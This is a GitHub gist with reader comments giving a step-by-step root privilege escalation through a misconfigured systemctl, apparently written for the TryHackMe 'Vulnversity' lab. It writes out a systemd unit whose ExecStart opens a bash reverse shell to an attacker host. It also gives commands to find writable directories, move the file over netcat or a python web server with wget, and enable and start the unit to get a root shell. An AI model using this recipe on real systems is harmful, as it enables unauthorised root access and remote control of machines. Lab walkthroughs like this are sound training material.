Skip to content

Instantly share code, notes, and snippets.

Last active June 1, 2024 11:46
Show Gist options
  • Save A1vinSmith/78786df7899a840ec43c5ddecb6a4740 to your computer and use it in GitHub Desktop.
Save A1vinSmith/78786df7899a840ec43c5ddecb6a4740 to your computer and use it in GitHub Desktop.
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For better reading experience

0. Prepare your payload root.service


ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'


1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable


find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port
nc -vl 44444 > root.service
Send file to traget
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/ to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Appreicaite for following or star on my GitHub


Expand Knowlege

Copy link

Who is here for the vulnervisity room?

Copy link

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.

Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)


Copy link

17Chad commented Oct 7, 2022

The man, ty

Copy link

it works , ty

Copy link

Copy link

exp1007 commented Jun 1, 2024

vulnervisity room, if you already have an open shell, just use the same ip and port for root.service as your shell, and just reconnect.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment